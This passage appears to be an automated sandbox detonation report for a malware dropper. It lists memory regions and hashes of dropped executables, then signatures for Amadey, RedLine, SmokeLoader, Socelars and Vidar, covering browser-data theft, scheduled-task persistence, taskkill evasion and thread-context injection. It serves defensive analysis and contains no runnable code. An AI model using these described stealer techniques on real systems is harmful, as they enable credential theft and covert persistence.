memory/924-98-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1292-99-0x0000000000000000-mapping.dmp

memory/1256-100-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

MD5 7582d154a918ef569fbee68f4228b5b1
SHA1 f21071ff67436886e6d405fb80e1eca8122045a5
SHA256 ff64865d28e16e978664eeb2edb57f0211c7d6606551c45886f2290cfb8aa825
SHA512 9699b51d23eaaacd2d2b4a9f80bd56a39fda04b9fda4bdcd21f04c69f152def37ffffe391cd66df434c6b0ab18912ab4b952e0b87589d69623d7c3fa2d00d1dd

memory/1376-103-0x0000000000000000-mapping.dmp

memory/976-105-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

memory/1864-108-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

memory/1740-111-0x0000000000000000-mapping.dmp

memory/1752-113-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

memory/1012-117-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

MD5 7582d154a918ef569fbee68f4228b5b1
SHA1 f21071ff67436886e6d405fb80e1eca8122045a5
SHA256 ff64865d28e16e978664eeb2edb57f0211c7d6606551c45886f2290cfb8aa825
SHA512 9699b51d23eaaacd2d2b4a9f80bd56a39fda04b9fda4bdcd21f04c69f152def37ffffe391cd66df434c6b0ab18912ab4b952e0b87589d69623d7c3fa2d00d1dd

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

memory/1460-125-0x0000000000000000-mapping.dmp

memory/928-124-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

MD5 7582d154a918ef569fbee68f4228b5b1
SHA1 f21071ff67436886e6d405fb80e1eca8122045a5
SHA256 ff64865d28e16e978664eeb2edb57f0211c7d6606551c45886f2290cfb8aa825
SHA512 9699b51d23eaaacd2d2b4a9f80bd56a39fda04b9fda4bdcd21f04c69f152def37ffffe391cd66df434c6b0ab18912ab4b952e0b87589d69623d7c3fa2d00d1dd

memory/1976-119-0x0000000000000000-mapping.dmp

memory/888-130-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

memory/1332-138-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

memory/1312-140-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13a2838ed1d8384.exe

MD5 7eabe99c5e09596cf11f66fff7bc36b8
SHA1 67129902195dcea7b2bbe510f00731f9d191058d
SHA256 2c60f26d37373e7feddc58863c1a70f4228ed688b4ede24484a08d060a6e51f9
SHA512 e5a96013e6ec5caf75308bf97a5f6719f4893add8c99d6b6f8cd93037a64bde20f963ac7489d05237e44a7124deda6da70a676ff228a54e0b9f587fc2a776807

memory/1504-146-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

memory/684-149-0x0000000000000000-mapping.dmp

memory/304-153-0x0000000000000000-mapping.dmp

memory/1720-144-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

MD5 4dd897695b3af1b31af9481a3ea94fd7
SHA1 9a5c9c968c50fe85de99fe2666978cc1d5c0033a
SHA256 736ef8efc4db84dbccfc69f304360abe15f12d710a983c3738af12dada10a715
SHA512 a2bf8d7d85ffdfcffc6ea1768cce4780907f3a7b247c583c376d33fa025b928320621bf295da076fbd5fa3df4d10bd424baf2200b4c181efb39f3686718b7417

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

memory/912-161-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe

MD5 96ab6b706f75ca5e1f3ccdf189ada08e
SHA1 6f851beb4ef8a534b5d65708392cefeb3650b074
SHA256 071350da27f8c628f61fdcc22f22217a96ffe413b4663349edadc7cdacf4bd18
SHA512 1671719806744e3f8f1dd21fcecaafc9f4162d76958f740ddd7729828090aecb3e5e55bd5a16d4e1aa573511b4b1d71bd86b90fab74687776fb273e8058abe34

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

memory/1244-172-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

memory/752-164-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

memory/1064-176-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe

MD5 e84d105d0c3ac864ee0aacf7716f48fd
SHA1 ce77ad0ab6e3861e7720ce2ae743aec4ef78f21a
SHA256 6b8ec5b540e75a799589a459cc46b4cec5c3c6d6e9376e7c48172fca66f41344
SHA512 8e66742b58408ed77946c024dd216ee162e5a72637bccb5276908cc1886c69618a3d63a17d7101d56079cb2ea3a2730fcd7773612bc28a3fb5fb0383ed651dc2

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe

MD5 de86aa83e2e8a406f396412b4fc1a459
SHA1 43b171a9c3c7a3f3d813434b4f74a1d66015244c
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f
SHA512 084cefa9847bf2e3c7bffdc7aee4c40291a0e2533972226839783ca93b3e37ddf8952a1653d2deb42cecfaa0872c756c47e14cf3eb12dacd4adc4bfbce3ce759

memory/1448-170-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

MD5 4dd897695b3af1b31af9481a3ea94fd7
SHA1 9a5c9c968c50fe85de99fe2666978cc1d5c0033a
SHA256 736ef8efc4db84dbccfc69f304360abe15f12d710a983c3738af12dada10a715
SHA512 a2bf8d7d85ffdfcffc6ea1768cce4780907f3a7b247c583c376d33fa025b928320621bf295da076fbd5fa3df4d10bd424baf2200b4c181efb39f3686718b7417

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

MD5 4dd897695b3af1b31af9481a3ea94fd7
SHA1 9a5c9c968c50fe85de99fe2666978cc1d5c0033a
SHA256 736ef8efc4db84dbccfc69f304360abe15f12d710a983c3738af12dada10a715
SHA512 a2bf8d7d85ffdfcffc6ea1768cce4780907f3a7b247c583c376d33fa025b928320621bf295da076fbd5fa3df4d10bd424baf2200b4c181efb39f3686718b7417

memory/684-184-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2004-187-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1724-182-0x0000000000000000-mapping.dmp

memory/852-186-0x0000000000000000-mapping.dmp

memory/2004-190-0x00000000004161D7-mapping.dmp

memory/2004-189-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1264-195-0x0000000000000000-mapping.dmp

memory/2040-193-0x0000000000000000-mapping.dmp

memory/2004-194-0x0000000000400000-0x0000000000450000-memory.dmp

memory/2004-198-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1912-199-0x0000000000000000-mapping.dmp

memory/888-201-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

memory/1264-200-0x0000000000290000-0x0000000000291000-memory.dmp

memory/752-204-0x0000000000000000-mapping.dmp

memory/1912-207-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1576-208-0x0000000000000000-mapping.dmp

memory/888-211-0x0000000000390000-0x0000000000391000-memory.dmp

memory/240-212-0x0000000000000000-mapping.dmp

memory/1576-215-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1264-216-0x0000000002450000-0x0000000002451000-memory.dmp

memory/752-214-0x0000000000110000-0x0000000000111000-memory.dmp

memory/888-218-0x0000000004C80000-0x0000000004C81000-memory.dmp

memory/240-217-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1724-219-0x0000000001EE0000-0x0000000002B2A000-memory.dmp

memory/852-220-0x0000000002060000-0x0000000002CAA000-memory.dmp

memory/1724-221-0x0000000001EE0000-0x0000000002B2A000-memory.dmp

memory/852-222-0x0000000002060000-0x0000000002CAA000-memory.dmp

memory/1724-223-0x0000000001EE0000-0x0000000002B2A000-memory.dmp

memory/1448-225-0x0000000000400000-0x0000000000440000-memory.dmp

memory/1448-224-0x0000000000230000-0x0000000000270000-memory.dmp

memory/1448-226-0x0000000000230000-0x0000000000270000-memory.dmp

memory/2116-227-0x0000000000000000-mapping.dmp

memory/2208-229-0x0000000000000000-mapping.dmp

memory/2116-232-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/1208-231-0x0000000002950000-0x0000000002966000-memory.dmp

memory/2308-233-0x0000000000000000-mapping.dmp

memory/2320-234-0x0000000000000000-mapping.dmp

memory/2364-237-0x0000000000000000-mapping.dmp

memory/2272-239-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2272-240-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2272-241-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2272-242-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2272-243-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2272-244-0x0000000000418EFA-mapping.dmp

memory/2272-246-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2504-248-0x0000000000000000-mapping.dmp

memory/2600-250-0x0000000000000000-mapping.dmp

memory/1504-252-0x0000000004020000-0x000000000416C000-memory.dmp

memory/2660-253-0x0000000000000000-mapping.dmp

memory/2696-255-0x0000000000000000-mapping.dmp

memory/2708-256-0x0000000000000000-mapping.dmp

memory/2736-260-0x0000000000000000-mapping.dmp

memory/2776-262-0x0000000000000000-mapping.dmp

memory/2272-265-0x0000000000990000-0x0000000000991000-memory.dmp

memory/2776-267-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2820-268-0x0000000000000000-mapping.dmp

memory/2836-269-0x0000000000000000-mapping.dmp

memory/2820-274-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/2884-275-0x0000000000000000-mapping.dmp

memory/2912-276-0x0000000000000000-mapping.dmp

memory/2912-279-0x0000000000270000-0x0000000000271000-memory.dmp

memory/928-280-0x000000001AB10000-0x000000001AB12000-memory.dmp

memory/2096-281-0x0000000000000000-mapping.dmp

memory/2216-285-0x0000000000000000-mapping.dmp

memory/1556-287-0x0000000000000000-mapping.dmp

memory/2216-289-0x0000000001F10000-0x0000000002011000-memory.dmp

memory/860-293-0x00000000009A0000-0x00000000009ED000-memory.dmp

memory/2216-292-0x0000000000700000-0x000000000075D000-memory.dmp

memory/860-294-0x0000000001450000-0x00000000014C2000-memory.dmp

memory/1620-298-0x0000000000000000-mapping.dmp

memory/2344-297-0x00000000FFA6246C-mapping.dmp

memory/1556-300-0x0000000004540000-0x0000000004541000-memory.dmp

memory/2344-302-0x00000000004B0000-0x0000000000522000-memory.dmp

memory/2776-303-0x0000000002000000-0x0000000002C4A000-memory.dmp

memory/2776-305-0x0000000002FE0000-0x0000000003095000-memory.dmp

memory/560-301-0x0000000000000000-mapping.dmp

memory/2528-306-0x0000000000000000-mapping.dmp

memory/2404-308-0x0000000000000000-mapping.dmp

memory/560-313-0x0000000000280000-0x0000000000292000-memory.dmp

memory/560-311-0x0000000000240000-0x000000000027A000-memory.dmp

memory/1620-315-0x00000000008D0000-0x00000000009A8000-memory.dmp

memory/1620-316-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1620-317-0x0000000001EC0000-0x0000000001F95000-memory.dmp

memory/2404-314-0x000000001B250000-0x000000001B252000-memory.dmp

memory/2528-318-0x000000001B040000-0x000000001B042000-memory.dmp

memory/1284-319-0x0000000000000000-mapping.dmp

memory/2416-321-0x0000000000000000-mapping.dmp

memory/2212-322-0x0000000000000000-mapping.dmp

memory/2132-325-0x0000000000000000-mapping.dmp

memory/1284-328-0x0000000000290000-0x00000000002EE000-memory.dmp

memory/2132-329-0x000000001B070000-0x000000001B072000-memory.dmp

memory/1284-330-0x0000000000290000-0x00000000002EE000-memory.dmp

memory/2868-332-0x0000000000000000-mapping.dmp

memory/1284-331-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2868-335-0x000000001B090000-0x000000001B092000-memory.dmp

memory/1292-347-0x0000000004B60000-0x0000000004B61000-memory.dmp

memory/3020-348-0x0000000000180000-0x0000000000181000-memory.dmp

memory/880-357-0x0000000000240000-0x0000000000241000-memory.dmp

memory/956-359-0x0000000001FA0000-0x00000000020A1000-memory.dmp

memory/956-360-0x0000000000710000-0x000000000076D000-memory.dmp

memory/860-361-0x0000000000FD0000-0x000000000101D000-memory.dmp

memory/860-362-0x0000000001B70000-0x0000000001BE2000-memory.dmp

memory/992-381-0x00000000054E0000-0x00000000054E1000-memory.dmp

memory/1284-383-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

memory/2920-382-0x0000000004C10000-0x0000000004C11000-memory.dmp

memory/2468-384-0x0000000000800000-0x0000000000801000-memory.dmp

memory/3020-392-0x0000000002F30000-0x0000000002FE6000-memory.dmp

memory/3020-393-0x00000000030B0000-0x0000000003165000-memory.dmp

memory/112-395-0x0000000002C70000-0x000000000307F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-11-19 18:12

Reported

2021-11-19 18:14

Platform

win10-en-20211014

Max time kernel

14s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

Signatures

Amadey

trojan amadey

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4996 set thread context of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
